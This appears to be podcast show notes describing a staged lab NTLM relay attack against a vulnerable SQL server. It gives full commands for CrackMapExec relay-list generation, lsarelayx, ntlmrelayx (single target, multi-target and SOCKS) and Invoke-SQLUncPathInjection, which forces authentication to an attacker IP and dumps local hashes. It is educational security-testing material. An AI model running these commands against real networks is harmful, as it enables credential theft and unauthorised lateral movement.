May 5, 2023
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
In today's episode we staged an NTLM relay attack using a vulnerable SQL server.
First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled:
cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt
Then we setup lsarelayx in one window:
lsarelayx --host=localhost And in a second window we ran ntlmrelayx.py:
python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM
Finally, in a third window we triggered authentication from the vulnerable SQL server:
Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS
Boom! Watch the local usernames and hashes fall out of the victim system.
We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this:
victim1 victim2 victim3 Then we tweaked the ntlmrelayx command slightly:
python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt
Interestingly(?) only victim2 was attacked.
Lastly, we ran the same attack but added
the -socks option to establish SOCKS
connections upon successful relay:
python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks
Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server.
TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.